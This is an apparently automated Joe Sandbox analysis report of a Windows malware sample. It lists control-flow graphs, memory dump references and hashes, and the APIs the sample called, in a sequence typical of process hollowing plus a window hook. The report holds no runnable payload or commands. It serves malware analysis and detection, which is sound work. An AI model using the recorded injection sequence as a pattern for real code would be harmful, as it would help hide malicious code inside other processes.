                                                                                                                                                                                                                                                                        control_flow_graph 681 10994a0-1099539 683 109953b-1099552 681->683 684 1099582-10995aa 681->684 683->684 689 1099554-1099559 683->689 687 10995ac-10995c0 684->687 688 10995f0-1099646 684->688 687->688 696 10995c2-10995c7 687->696 698 1099648-109965c 688->698 699 109968c-109977a CreateProcessA 688->699 690 109955b-1099565 689->690 691 109957c-109957f 689->691 693 1099569-1099578 690->693 694 1099567 690->694 691->684 693->693 697 109957a 693->697 694->693 700 10995c9-10995d3 696->700 701 10995ea-10995ed 696->701 697->691 698->699 707 109965e-1099663 698->707 717 109977c-1099782 699->717 718 1099783-1099848 699->718 702 10995d5 700->702 703 10995d7-10995e6 700->703 701->688 702->703 703->703 706 10995e8 703->706 706->701 708 1099665-109966f 707->708 709 1099686-1099689 707->709 711 1099671 708->711 712 1099673-1099682 708->712 709->699 711->712 712->712 713 1099684 712->713 713->709 717->718 729 1099864-1099865 718->729 730 109983f-1099848 729->730 731 1099867-1099868 729->731 730->729 732 1099878-109987c 731->732 733 109986a-109986e 731->733 735 109988c-1099890 732->735 736 109987e-1099882 732->736 733->732 734 1099870 733->734 734->732 738 10998a0-10998a4 735->738 739 1099892-1099896 735->739 736->735 737 1099884 736->737 737->735 741 10998da-10998e5 738->741 742 10998a6-10998cf 738->742 739->738 740 1099898 739->740 740->738 745 10998e6 741->745 742->741 745->745
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01099767
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                                        • Opcode ID: 0af0f38e5db6fe52dfad4f6dc667b46e6759621ec5b3c7a43856bda6aad14e24
                                                                                                                                                                                                                                                                        • Instruction ID: a792dc7dbb5d2ae012903c76670c7f34050d5383274887b2f521f40d80431961
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0af0f38e5db6fe52dfad4f6dc667b46e6759621ec5b3c7a43856bda6aad14e24
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFC12570D002198FDF24CFA9C895BEEBBB1BF49304F0481A9E849B7250DB749A85DF95

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 823 1099118-1099183 825 109919a-10991fb WriteProcessMemory 823->825 826 1099185-1099197 823->826 828 10991fd-1099203 825->828 829 1099204-1099256 825->829 826->825 828->829
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 010991EB
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                        • Opcode ID: 9cbac02e90803ec7bd4a75341aba1f4da716d4a9c90332dda69f3121a1fa79d9
                                                                                                                                                                                                                                                                        • Instruction ID: e4832d8a051fcf85e345fd84f865aabafd9dc435a6116db429a7b4511ad06c15
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cbac02e90803ec7bd4a75341aba1f4da716d4a9c90332dda69f3121a1fa79d9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B41BAB4D012589FDF10CFA9D984AEEFBF1BB49310F10942AE818B7200D739AA45CF64

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 834 109911a-1099183 836 109919a-10991fb WriteProcessMemory 834->836 837 1099185-1099197 834->837 839 10991fd-1099203 836->839 840 1099204-1099256 836->840 837->836 839->840
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 010991EB
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                        • Opcode ID: 65426fb414b64e5dc23a3642e8e2da575348a982bbed7103e5f3731f3806df1d
                                                                                                                                                                                                                                                                        • Instruction ID: f1591e50f5103bf2bccc033f0c1dcbcc5f6bb4c7b1f800041ed2aafe2c512c92
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65426fb414b64e5dc23a3642e8e2da575348a982bbed7103e5f3731f3806df1d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7041BAB4D012588FDF10CFA9D984AEEFBF1BB49310F10942AE818B7200D339AA46CF54

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 845 1099270-1099332 ReadProcessMemory 848 109933b-109938d 845->848 849 1099334-109933a 845->849 849->848
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01099322
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                        • Opcode ID: ed617c8e018385cab751f12e17670c2906c94f31642351f0e0001b5f27b5f1ad
                                                                                                                                                                                                                                                                        • Instruction ID: eb20937c865a1d822cb0cad2feed24222ac0c93fe1138698fce6e04f69095d92
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed617c8e018385cab751f12e17670c2906c94f31642351f0e0001b5f27b5f1ad
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A341ABB5D042589FCF10CFAAD885AEEFBB1BB09310F14A42AE815B7240D735A946CF64

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 854 1098ff8-10990b2 VirtualAllocEx 857 10990bb-1099105 854->857 858 10990b4-10990ba 854->858 858->857
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 010990A2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                        • Opcode ID: e2eca94672886e7164251f1266ebb35bf59f904f2518bdfa7eef5592335a8a7e
                                                                                                                                                                                                                                                                        • Instruction ID: d5a98929561242b3ce313c65ffc007b7530054fb6ae54a46abaca1602c61ffc7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2eca94672886e7164251f1266ebb35bf59f904f2518bdfa7eef5592335a8a7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0331A6B8D002589FCF20CFA9D885ADEFBB1BB49310F10942AE825B7200D735A902CF64

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 863 1098ffa-10990b2 VirtualAllocEx 866 10990bb-1099105 863->866 867 10990b4-10990ba 863->867 867->866
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 010990A2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                        • Opcode ID: c6608d750ac46817b5fc01e2475a317c77018999e0fd725ee4f5486ffa105e68
                                                                                                                                                                                                                                                                        • Instruction ID: d3c4ca49a1a4642c1e039efa90a316162e34dfe5c02a826ea6b3f96864f5cbcd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6608d750ac46817b5fc01e2475a317c77018999e0fd725ee4f5486ffa105e68
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F3197B9D002589FCF24CFA9D985AEEFBB1BF49310F10942AE825B7210D735A946CF54

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 872 1098ec8-1098f30 874 1098f32-1098f44 872->874 875 1098f47-1098f8f Wow64SetThreadContext 872->875 874->875 877 1098f98-1098fe4 875->877 878 1098f91-1098f97 875->878 878->877
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 01098F7F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                                        • Opcode ID: 4be348334d8ead0a835309d3df1ea87cfa07e97b6aaeb6f696652a42f02358e0
                                                                                                                                                                                                                                                                        • Instruction ID: 8280a8d97670475c27d4dc027127de0ef827c3a2bf1feb2158f2dd3d473fa697
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4be348334d8ead0a835309d3df1ea87cfa07e97b6aaeb6f696652a42f02358e0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C341EBB4D002589FDB10CFA9D885AEEBBF1BF49310F14802AE458B7240D738A946CF94

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 883 1091bd1-1091c8f VirtualProtect 885 1091c98-1091cd4 883->885 886 1091c91-1091c97 883->886 886->885
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01091C7F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                                                        • Opcode ID: a28fb00e41c91a2202c0aa34714c4ae96641cd628e4860a1d8542be17fe7ad2d
                                                                                                                                                                                                                                                                        • Instruction ID: 9b1a11b7f7affd8c7c5156dd591bc44f837917de88dce0d0258f98a2328abb21
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a28fb00e41c91a2202c0aa34714c4ae96641cd628e4860a1d8542be17fe7ad2d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C3199B9D042589FCF10CFA9E984AEEFBF1BB19310F24902AE855B7210D375A945CF64

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 889 1091bd8-1091c8f VirtualProtect 891 1091c98-1091cd4 889->891 892 1091c91-1091c97 889->892 892->891
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01091C7F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                                                        • Opcode ID: 8f39208b6712b26023a23503419217818bb522bee27ab5e6e39ecde03e37c457
                                                                                                                                                                                                                                                                        • Instruction ID: b47cd03e4d725eed0cd26322b5290a545b11b70f3b1710fdbc5f7e7ebf17a0f2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f39208b6712b26023a23503419217818bb522bee27ab5e6e39ecde03e37c457
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A73199B9D042589FCF10CFA9D484ADEFBF1BB19310F14902AE854B7210D375A945CF64

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 895 1098ed0-1098f30 897 1098f32-1098f44 895->897 898 1098f47-1098f8f Wow64SetThreadContext 895->898 897->898 900 1098f98-1098fe4 898->900 901 1098f91-1098f97 898->901 901->900
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 01098F7F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                                        • Opcode ID: 0156931f61d00f49c5064aa4266a70aaa76ca0673b112c6b33bb4a31b9fc6aa2
                                                                                                                                                                                                                                                                        • Instruction ID: 31d31bb67a7de3d639bb693e0e376fd15ec023d76331d4054dd598b7e230eb72
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0156931f61d00f49c5064aa4266a70aaa76ca0673b112c6b33bb4a31b9fc6aa2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8531CAB4D002589FDB14CFAAD885AEEBBF1BB49310F14802AE419B7240D778A945CF94

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 906 1098a11-1098aa6 ResumeThread 909 1098aa8-1098aae 906->909 910 1098aaf-1098af1 906->910 909->910
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 01098A96
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                        • Opcode ID: cb21f0dbc74527d6a0ea1fe50883d8fe5047d8edfa95ef74f1697b72f79cef5f
                                                                                                                                                                                                                                                                        • Instruction ID: 62632be732801d656c58ef943f92592c2c408ffc6ae7964ad85817720f2c25ef
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb21f0dbc74527d6a0ea1fe50883d8fe5047d8edfa95ef74f1697b72f79cef5f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4031B9B4D012189FDB24CFA9D881AEEFBB1AB49310F14842AE815B7300D779A802CF54

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 915 1098a18-1098aa6 ResumeThread 918 1098aa8-1098aae 915->918 919 1098aaf-1098af1 915->919 918->919
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 01098A96
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                        • Opcode ID: 5d9e3dc6bce9dc112da112c9624b0a70585394329676e846ad687f5d42c5629e
                                                                                                                                                                                                                                                                        • Instruction ID: f38d3463156e3d996b795db3362c45511f2cd2baa1caa60d18bf06dde6e85915
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9e3dc6bce9dc112da112c9624b0a70585394329676e846ad687f5d42c5629e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0131ABB4D012189FDF24CFA9D885A9EFBB5AB49310F14942AE815B7300D779A902CF54
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1330437386.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_ccd000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 09b9ec37424df0bf6d21175c609faf5094f86217fde5ad6d459a5527a43a639f
                                                                                                                                                                                                                                                                        • Instruction ID: 0696f99cccaf89433018e43302bcf29c9dd42357c3f6d0b55a47a0fd64a269ac
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09b9ec37424df0bf6d21175c609faf5094f86217fde5ad6d459a5527a43a639f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE21C1B1504244EFDB15DF10D9C0F26BF65FB98328F2485BDE80A0A256C336D956CAA2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1330437386.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_ccd000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                                                                                                                                                                                                                                        • Instruction ID: e6d28c00115ed2dbb5071840a577be1b22beed42c043f5a69ba680c69a6106b2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0611D3B6504240DFCB05CF10D5C4B16BF72FB98324F24C5ADD80A0B256C336D956CBA1

                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                        Execution Coverage

                                                                                                                                                                                                                                                                        Dynamic/Packed Code Coverage

                                                                                                                                                                                                                                                                        Signature Coverage

                                                                                                                                                                                                                                                                        Execution Coverage:11.1%
                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                        Total number of Nodes:42
                                                                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                        Show Legend
                                                                                                                                                                                                                                                                        Hide Nodes/Edges
                                                                                                                                                                                                                                                                        execution_graph 20195 6d002a0 20196 6d002b5 20195->20196 20197 6d00554 20196->20197 20200 6d050c3 20196->20200 20205 6d050c8 20196->20205 20201 6d050ed 20200->20201 20210 6d05368 20201->20210 20214 6d0535b 20201->20214 20202 6d0514f 20202->20197 20206 6d050ed 20205->20206 20208 6d05368 GlobalMemoryStatusEx 20206->20208 20209 6d0535b GlobalMemoryStatusEx 20206->20209 20207 6d0514f 20207->20197 20208->20207 20209->20207 20211 6d05376 20210->20211 20218 6d053a0 20210->20218 20223 6d0539b 20210->20223 20211->20202 20216 6d053a0 GlobalMemoryStatusEx 20214->20216 20217 6d0539b GlobalMemoryStatusEx 20214->20217 20215 6d05376 20215->20202 20216->20215 20217->20215 20219 6d053d5 20218->20219 20220 6d053ad 20218->20220 20228 6d04d68 20219->20228 20220->20211 20224 6d053a0 20223->20224 20225 6d053ad 20224->20225 20226 6d04d68 GlobalMemoryStatusEx 20224->20226 20225->20211 20227 6d053f2 20226->20227 20227->20211 20229 6d05478 GlobalMemoryStatusEx 20228->20229 20231 6d053f2 20229->20231 20231->20211 20189 14c5c48 20190 14c5c8c SetWindowsHookExW 20189->20190 20192 14c5cd2 20190->20192 20232 14cad58 20233 14cad9e GetCurrentProcess 20232->20233 20235 14cadf0 GetCurrentThread 20233->20235 20238 14cade9 20233->20238 20236 14cae2d GetCurrentProcess 20235->20236 20237 14cae26 20235->20237 20239 14cae63 20236->20239 20237->20236 20238->20235 20240 14cae8b GetCurrentThreadId 20239->20240 20241 14caebc 20240->20241 20193 14cafa0 DuplicateHandle 20194 14cb036 20193->20194

                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 014CADD6
                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 014CAE13
                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 014CAE50
                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 014CAEA9
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2463025501.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_14c0000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                        • Opcode ID: 883a5d5cf7f7c48a1b7d5fe3daf1632b02d59ab31bfd249bd824fd0944d71b62
                                                                                                                                                                                                                                                                        • Instruction ID: d2b0b6e5e9dcf36f951ab460229dbf0a6e2b2654236ad973d8156bcd4e7bc44e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 883a5d5cf7f7c48a1b7d5fe3daf1632b02d59ab31bfd249bd824fd0944d71b62
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB5178B4D002098FDB18CFAAD548B9EBBF1EB48314F20801EE018A7360DB396945CF65

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 014CADD6
                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 014CAE13
                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 014CAE50
                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 014CAEA9
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2463025501.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_14c0000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                        • Opcode ID: 09b7f2f420bbed139084874d0d4304d7ab1cd2214b62b71b8603fea1fb31790d
                                                                                                                                                                                                                                                                        • Instruction ID: ae591f66e40b6a52dd3d47205270848ba5b189aa81775943c9b26729d24e2fb9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09b7f2f420bbed139084874d0d4304d7ab1cd2214b62b71b8603fea1fb31790d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA5155B4D102098FDB58CFAAD548B9EBBF1FB48314F20845EE019A7360DB396945CF65

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 493 14caf98-14caf9b 494 14cafa0-14cb034 DuplicateHandle 493->494 495 14cb03d-14cb05a 494->495 496 14cb036-14cb03c 494->496 496->495
                                                                                                                                                                                                                                                                        APIs
